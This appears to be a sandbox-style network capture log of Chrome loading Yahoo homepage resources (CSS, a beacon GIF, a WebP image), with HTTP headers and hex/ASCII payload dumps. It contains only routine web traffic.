                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC436INData Raw: 22 2c 6c 3d 5b 5d 2c 69 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 2b 3d 65 2e 72 65 70 6c 61 63 65 28 22 3c 42 45 41 43 4f 4e 3e 22 2c 6e 29 2c 6c 2e 70 75 73 68 28 65 2e 72 65 70 6c 61 63 65 28 22 3c 42 45 41 43 4f 4e 3e 22 2c 6e 29 29 7d 29 2c 22 67 72 6f 75 70 22 3d 3d 74 68 69 73 2e 75 70 6c 6f 61 64 54 79 70 65 3f 28 63 20 69 6e 20 74 68 69 73 2e 70 65 6e 64 69 6e 67 7c 7c 28 74 68 69 73 2e 70 65 6e 64 69 6e 67 5b 63 5d 3d 5b 5d 29 2c 74 68 69 73 2e 70 65 6e 64 69 6e 67 5b 63 5d 2e 70 75 73 68 28 5b 75 2c 6c 5d 29 2c 74 68 69 73 2e 63 6f 6d 70 6c 65 74 65 2b 2b 2c 74 68 69 73 2e 63 6f 6d 70 6c 65 74 65 3d 3d 74 68 69 73 2e 65 78 70 43 6f 75 6e 74 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 68 69 73 2e 70 65 6e 64 69 6e 67 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ",l=[],i.forEach(function(e){c+=e.replace("<BEACON>",n),l.push(e.replace("<BEACON>",n))}),"group"==this.uploadType?(c in this.pending||(this.pending[c]=[]),this.pending[c].push([u,l]),this.complete++,this.complete==this.expCount&&Object.keys(this.pending)


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    46192.168.2.44980687.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC611OUTGET /pv/static/ms/trendingNow-flameIcon.yhome-variable.a2368adb8251677d29ac1399a6f34c43.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC698INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: KA3pdFqi+mEX19Kau18TkBGV/pHteXpwHWp0jbOodmOmeSTc9QMDu/6Loc60Z1NxVpovu8a0/eyhd1IVc0EkqVD28LCdrL3G
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: W0V6TVWWFWSHWF5M
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 24 Sep 2024 14:05:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 28 Mar 2023 10:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "da05f5d596c887a6a5221011fa70d158"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=315360000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 1610
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 530126
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 3a 72 6f 6f 74 2c 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 64 61 72 6b 5d 20 5b 64 61 74 61 2d 6d 61 69 6e 74 61 69 6e 2d 63 6f 6c 6f 72 5d 2c 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 6c 69 67 68 74 5d 7b 2d 2d 73 72 63 68 2d 74 6e 2d 66 6c 61 6d 65 2d 63 6f 6c 6f 72 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 2d 36 33 2e 39 34 64 65 67 2c 20 23 31 44 32 32 32 38 20 30 25 2c 20 23 31 44 32 32 32 38 20 31 36 2e 31 25 2c 20 23 42 32 33 39 30 39 20 31 36 2e 31 25 2c 20 23 42 32 33 39 30 39 20 33 32 2e 32 25 2c 20 23 46 46 35 32 30 44 20 33 32 2e 32 25 2c 20 23 46 46 35 32 30 44 20 34 38 2e 32 25 2c 20 23 31 44 32 32 32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: :root,html[data-color-scheme=dark] [data-maintain-color],html[data-color-theme-enabled][data-color-scheme=light]{--srch-tn-flame-color:linear-gradient(-63.94deg, #1D2228 0%, #1D2228 16.1%, #B23909 16.1%, #B23909 32.2%, #FF520D 32.2%, #FF520D 48.2%, #1D222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC310INData Raw: 39 20 33 32 2e 32 25 2c 20 23 46 46 35 32 30 44 20 33 32 2e 32 25 2c 20 23 46 46 35 32 30 44 20 34 38 2e 32 25 2c 20 23 31 44 32 32 32 38 20 34 38 2e 32 25 2c 20 23 31 44 32 32 32 38 20 36 37 2e 38 25 2c 20 23 42 32 33 39 30 39 20 36 37 2e 38 25 2c 20 23 42 32 33 39 30 39 20 38 33 2e 39 25 2c 20 23 46 46 35 32 30 44 20 38 33 2e 39 25 29 3b 2d 2d 73 72 63 68 2d 74 6e 2d 66 6c 61 6d 65 2d 69 63 6f 6e 3a 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 70 76 2f 73 74 61 74 69 63 2f 69 6d 67 2f 69 63 6f 6e 2d 66 6c 61 6d 65 2d 6c 69 67 68 74 2d 32 30 32 33 30 33 30 31 30 33 35 32 2e 67 69 66 27 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 72 63 68 54 6e 54 65 78 74 41 6e 69 6d 74 69 6f 6e 7b 30 25 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 9 32.2%, #FF520D 32.2%, #FF520D 48.2%, #1D2228 48.2%, #1D2228 67.8%, #B23909 67.8%, #B23909 83.9%, #FF520D 83.9%);--srch-tn-flame-icon:url('https://s.yimg.com/pv/static/img/icon-flame-light-202303010352.gif')}}@keyframes srchTnTextAnimtion{0%{background-p


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    47192.168.2.44980787.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1031OUTGET /info/p.gif?apptype=default&beaconType=pageRenderEnd&code=pageRender&bucket=900%2Cseamless&device=desktop&intl=us&rid=1pa4ckpjflnfm&site=fp&t=1727716855086 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC589INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-security-policy-report-only: default-src 'self'; report-uri https://csp.yahoo.com/beacon/csp?src=fendr_beaconeater.media.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:20:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC762INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    48192.168.2.44980887.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC763OUTGET /uu/api/res/1.2/PfuFkSI.w9qemWReAv.2kA--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/a0026210-7f1b-11ef-92ab-b839323afb9a.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1265INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 8870
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: inline; filename="a0026210-7f1b-11ef-92ab-b839323afb9a.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "cc5d683f7579b245520de6f372ef6dd7"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expiration: expiry-date="Sun, 30 Mar 2025 00:00:00 GMT", rule-id="delete fetch for mysterio after 180 days"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 30 Sep 2024 11:04:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 11:06:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server-Timing: cld-fastly;mitm=po;dur=40;cpu=0;start=2024-09-30T11:06:45.457Z;desc=miss,rtt;dur=84,content-info;desc="width=356,height=180,bytes=8870,owidth=4402,oheight=2479,obytes=1195821,ef=(1,13,17,23,30)",cloudinary;dur=29;start=2024-09-30T11:06:45.460Z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-request-id: 001b0ea20b5637c8fbf8bc96ffa06eff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 22452
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cld_cache: miss
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cld_id: 001b0ea20b5637c8fbf8bc96ffa06eff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-width: 356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-height: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 52 49 46 46 9e 22 00 00 57 45 42 50 56 50 38 20 92 22 00 00 50 a5 00 9d 01 2a 64 01 b4 00 3e 79 34 95 46 a4 a3 22 21 2c d3 fd 60 90 0f 09 67 08 90 26 5f 04 f9 f6 da f9 4a 4b 54 4a bd d3 6f 99 1f b9 4b a0 e3 7b 2e f6 db c0 45 f6 7f 18 8d 3f 0e 34 f0 7d 53 d8 33 f5 2f ac af 81 3f dc fd 45 ba 68 27 b0 6d 3f 65 34 e1 64 07 ae b7 c3 f2 59 e5 6d 89 4f c5 88 ad 23 de fa e2 ac e7 62 e7 b0 d0 d7 21 53 ab 00 41 4f dc 50 7e fe a1 d6 d4 da 4c 1d 61 fe 87 e6 75 c7 8e 5d 76 df 7b 51 e5 3b dc 6d 07 09 89 21 4a 98 61 e6 31 b6 0e 0c 25 8b e1 3f c1 46 13 c9 3f cb 3a 18 41 91 80 ee d0 ac 3f 10 2d 0f b9 5f 17 36 ca a3 c3 e0 97 64 1b 14 80 5a 2f 7a 73 80 2e 33 ae 1d 29 76 0f 14 2d d0 5b 41 f5 23 35 4d 80 d4 73 59 0f b2 d3 b5 99 b7 9b c4 30 6b ed 9b f5 58 23 fb b0 ce 88 8b 80
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: RIFF"WEBPVP8 "P*d>y4F"!,`g&_JKTJoK{.E?4}S3/?Eh'm?e4dYmO#b!SAOP~Lau]v{Q;m!Ja1%?F?:A?-_6dZ/zs.3)v-[A#5MsY0kX#
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: f2 df 2d 80 2e 28 be 71 f1 96 30 40 c7 7c ab e9 6c fd 42 f5 ea 5c bc ff 6c e0 96 31 35 b3 7d 37 b3 99 33 ab 3a 20 85 23 cb 1c 65 cb f5 fd 10 8a 5f 13 40 00 fe dd 36 40 99 4b 32 ec b3 d6 a4 63 fe a4 59 03 32 5d 39 c8 cb 2a 00 96 58 47 dd 8a d6 45 ab e3 4b 56 68 d7 90 77 c9 f9 4f 30 13 7f e4 48 79 b0 78 d8 32 0a 0a 51 6a cd 07 3a 37 01 eb d2 8d 8a 62 4d 6d fd ca 48 53 3f ed 52 80 fe e2 88 80 49 fe f1 c6 17 c7 4e b5 ac f3 9b 36 06 d3 c9 6c 4e 8b 0c 2d ab 93 52 37 77 bb 65 e1 3b 1e 6c 1c 5b 05 e7 d7 1e 5c 15 cf 1e cb b6 7e b0 95 2e 33 78 06 68 d3 de 5a 22 65 26 ba c8 43 53 5f 4f e5 41 d8 23 8f f8 d6 33 e6 2c 21 3a 47 09 4b 22 bf 73 fa 3f dd 24 f0 7e ec 79 8e 03 b8 bc 0d d9 12 ba ec 63 56 39 86 fd 15 b6 65 d9 04 17 19 e2 86 80 50 b1 20 87 a8 54 3a 83 15 c2 51
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: -.(q0@|lB\l15}73: #e_@6@K2cY2]9*XGEKVhwO0Hyx2Qj:7bMmHS?RIN6lN-R7we;l[\~.3xhZ"e&CS_OA#3,!:GK"s?$~ycV9eP T:Q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 14 0a e0 fc ec 78 fb 9f e9 10 95 6f a5 62 a1 2b 5e 79 02 d4 e1 6a 7b 7e f0 cb 72 2a e8 e7 a6 fd 86 df 34 8e 03 9d 9b 4d 4b 1c c4 6c 14 5b 51 d5 2c 32 7a bc d5 d0 4a 18 9b 4f d3 aa 8f 26 4f 9d 53 50 cf 45 31 d5 1b a5 09 ef 00 99 a3 26 bc 64 2b 8d 7d a5 27 17 9e ac ce a0 6f a0 1b 91 3a fa 42 d7 3a a2 6e 11 16 fd 65 ce 14 26 c7 9a e1 16 bc 0d 12 61 31 62 eb f4 e7 4d c5 27 45 f1 a3 8f 63 c0 ad f7 39 85 d0 61 48 88 72 46 d3 f4 68 e0 17 4b 22 de f6 db 6a ac 8e 07 59 e4 1a 48 6d c7 d4 a3 a8 09 f0 5e 3e 09 08 08 f3 7c c4 6d 3f 9b e9 5d fb 03 d9 c1 74 6c 3c 1b 39 2c cd e3 ce 07 b2 ed d0 d2 c3 4a 10 6f 56 b3 50 65 73 55 c6 8f b8 a6 8d 49 e2 67 21 69 fd 2f a1 a8 90 07 82 74 c8 58 ef ff 90 4d a2 75 13 43 f6 b9 00 7d c7 9b fe 7a 86 ed 45 4b 07 d2 7a b6 65 21 ce 8c ff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: xob+^yj{~r*4MKl[Q,2zJO&OSPE1&d+}'o:B:ne&a1bM'Ec9aHrFhK"jYHm^>|m?]tl<9,JoVPesUIg!i/tXMuC}zEKze!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 40 45 54 8e 52 55 59 65 c4 f2 86 e6 0b 6e d1 c4 d3 ba 84 82 9a 68 c3 91 eb 24 a4 e1 01 4d b5 e0 91 fd 92 80 7b fd 5a c5 b3 e1 64 64 a5 13 a0 ce 64 c8 ec 70 c1 db 4c a4 b9 92 5f 0b 98 f9 f1 06 a6 10 c0 1d 92 fd 0c 12 4d 54 29 bd c1 a0 35 4d fc 80 cf 1a 9d a9 d8 e0 d0 ee 2f db 70 dc 08 0b fb b2 29 a3 83 aa 23 42 ad a0 48 99 0d 35 21 61 50 3d 7b 34 81 9d b5 57 9e 6c 90 fc ee 12 1c e8 d9 af c3 fc ab 5a 5f 4a 75 e0 45 8d 21 6c 20 6c f3 85 9c be 37 f5 87 8f 15 a0 77 e0 a3 0c d9 a6 f9 ec 33 dc 77 b8 31 61 a7 de 74 58 c5 f6 6b b0 fb fb 87 47 c5 61 6b cd c5 a5 e2 56 da 90 aa 0b 2a eb 26 69 b7 53 ff 61 13 74 38 6a e7 26 56 d6 47 d4 37 34 9a 7b 19 65 d0 63 49 e3 ef 7d 54 d9 8b b6 3b ad 66 68 74 7b eb d6 aa 2a 68 ed d2 ec 54 93 68 bf c7 8c 2a 1a 8d b0 47 ba 28 d4 ad
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: @ETRUYenh$M{ZdddpL_MT)5M/p)#BH5!aP={4WlZ_JuE!l l7w3w1atXkGakV*&iSat8j&VG74{ecI}T;fht{*hTh*G(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 6b c3 1e 2d 71 d8 eb 85 db 6d 0c 00 d3 fd 50 13 5b d3 11 27 65 f9 34 95 8c f9 4b af e8 13 b3 4f 0f d0 5d 62 64 53 2e 89 f8 d0 7a 78 cc 7a 4a b0 8d a5 43 22 c8 23 4a c4 b4 87 1a 9d e7 86 3f 42 2c 84 97 7e 02 dd ad 7e fe ac d0 69 d5 51 8d 52 f4 b3 aa cd 5d 62 bc f2 3a 9d f5 8e 2f 51 c7 29 43 39 83 68 60 c2 79 44 b8 9f 3e 40 8d 27 d9 ae 0a 97 a6 68 86 5d ce 31 1d de 96 f6 f8 04 d5 f7 9e 24 b6 36 31 9b a5 d5 32 02 b8 fc 1e c9 e0 3d 9e b7 af fc b9 9a c0 98 85 c6 1b 29 17 1a 5e cf ee 6c db a1 a1 a4 9c 4e 6b dc 19 c7 3b f4 49 c9 3c 5d 62 76 af ff b0 97 40 fe db 49 e0 52 f1 d4 12 36 7b 0e 24 4e 6c 57 35 06 43 72 76 fd a8 a8 f0 39 9a f9 eb ff 9d d8 ed ec 55 f2 d6 2b 90 a6 4f 69 d4 d7 de 34 1c 79 69 49 c9 d9 3d 20 3e 96 6f 20 fd 04 b4 86 58 e4 38 0c 8a ba d1 64 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: k-qmP['e4KO]bdS.zxzJC"#J?B,~~iQR]b:/Q)C9h`yD>@'h]1$612=)^lNk;I<]bv@IR6{$NlW5Crv9U+Oi4yiI= >o X8df
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 2c 36 70 cb ba 34 ac f6 d6 0e 76 19 6d 84 7b c9 4f 36 1b 9f ff 06 36 af f2 9c 8a 87 c7 5a 45 22 c5 db 64 4a 59 9f d0 8b 1c a3 19 26 f0 9f e4 aa e7 12 b5 b9 86 2c 9a 5b 80 b8 c1 ca 66 7c 9f 46 a2 e0 3c 15 26 d8 61 29 4d 98 b1 1b 7b ad 4e c8 99 da e6 38 34 fb 7b 29 ef 7c 49 24 91 6b 5c 27 96 4f ed d1 66 b3 3d f2 04 7f 74 a1 22 00 c0 a9 bd d5 51 bb 8a 35 3d 14 d9 0f c1 5a 96 86 a2 ba 32 c7 66 0b c8 83 65 b4 1f 90 ca 6d 2c 79 b9 58 51 a9 11 ba 60 c4 71 05 78 a7 3c 82 6b 77 20 04 3c cf 27 44 ac 64 5c 33 aa 1c fb 4d 1e b1 15 de d4 81 57 c0 21 27 2f 5f 11 96 b8 43 ac a3 0d f4 22 5e aa 1a bb 93 3e 98 f8 90 59 f8 26 8b bd c0 d6 77 d9 26 fd 2c 7c 1d 7a d7 58 d2 dd 33 f4 06 d8 62 38 cf 3c bf 99 b7 cd 60 8e bf 01 0a a3 7f fc 56 89 43 25 c8 56 58 77 07 01 d4 5f c1 db
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,6p4vm{O66ZE"dJY&,[f|F<&a)M{N84{)|I$k\'Of=t"Q5=Z2fem,yXQ`qx<kw <'Dd\3MW!'/_C"^>Y&w&,|zX3b8<`VC%VXw_
